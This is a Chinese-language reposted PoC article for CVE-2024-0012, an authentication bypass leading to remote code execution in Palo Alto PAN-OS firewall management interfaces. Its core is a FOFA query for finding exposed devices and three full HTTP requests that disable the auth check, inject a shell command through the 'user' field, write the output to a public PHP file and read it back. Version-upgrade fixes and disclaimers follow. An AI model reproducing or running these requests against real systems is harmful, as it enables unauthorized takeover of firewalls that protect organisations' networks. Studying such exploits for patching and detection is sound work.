Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)

admin 2024年12月2日22:50:56评论13 views字数 1278阅读4分15秒阅读模式
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)

内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的POC信息及POC对应脚本而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号nday poc及作者不为此承担任何责任,一旦造成后果请自行承担!如文章有侵权烦请及时告知,我们会立即删除文章并致歉。谢谢!

00
产品简介

PAN-OS 是运行 Palo Alto Networks 下一代防火墙的软件。通过利用 PAN-OS 本机内置的关键技术(App-ID、Content-ID、设备 ID 和用户 ID),可以在任何时间、任何地点完全了解和控制所有用户和设备中正在使用的应用程序。

01
漏洞概述

PAN-OS 设备管理WEB界面中存在身份认证绕过漏洞,未经身份验证的远程攻击者可以通过网络访问管理 Web 界面,从而进行后续活动,包括修改设备配置、访问其他管理功能以及利用 Palo Alto Networks PAN-OS 权限提升漏洞(CVE-2024-9474)获取root访问权限,执行任意命令,目前该漏洞技术细节与PoC已在互联网上公开,鉴于此漏洞已发现在野利用,建议用户尽快做好自查及防护。

02
搜索引擎
FOFA:
icon_hash="873381299"
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)
03
漏洞复现
1、身份认证绕过获取cookie并注入命令
POST /php/utils/createRemoteAppwebSession.php/rce.js.map HTTP/1.1Host: X-PAN-AUTHCHECK: offContent-Type: application/x-www-form-urlencodeduser=`echo $(ifconfig) > /var/appweb/htdocs/unauth/rce.php`&userRole=superuser&remoteHost=&vsys=vsys1
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)
2、携带cookie权限提升并执行命令
GET /index.php/.js.map HTTP/1.1Host: Cookie: 上一步返回的cookieX-PAN-AUTHCHECK: offConnection: keep-alive
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)
3、获取命令执行结果
GET /unauth/rce.php HTTP/1.1Host: Cookie: 上一步获取的cookieX-PAN-AUTHCHECK: offConnection: keep-alive
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)
04
检测工具

nuclei

Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)

afrog

Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)

xray

Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)
05
修复建议

1、关闭互联网暴露面或接口设置访问权限

2、目前官方已有可更新版本,建议受影响用户升级至最新版本:

PAN-OS 10.1 >= 10.1.14-h6

PAN-OS 10.2 >= 10.2.12-h2

PAN-OS 11.0 >= 11.0.6-h1

PAN-OS 11.1 >= 11.1.5-h1

PAN-OS 11.2 >= 11.2.4-h1

请参阅发布说明:

https://security.paloaltonetworks.com/CVE-2024-0012

06

原文始发于微信公众号(nday POC):Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月2日22:50:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)https://cn-sec.com/archives/3459566.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息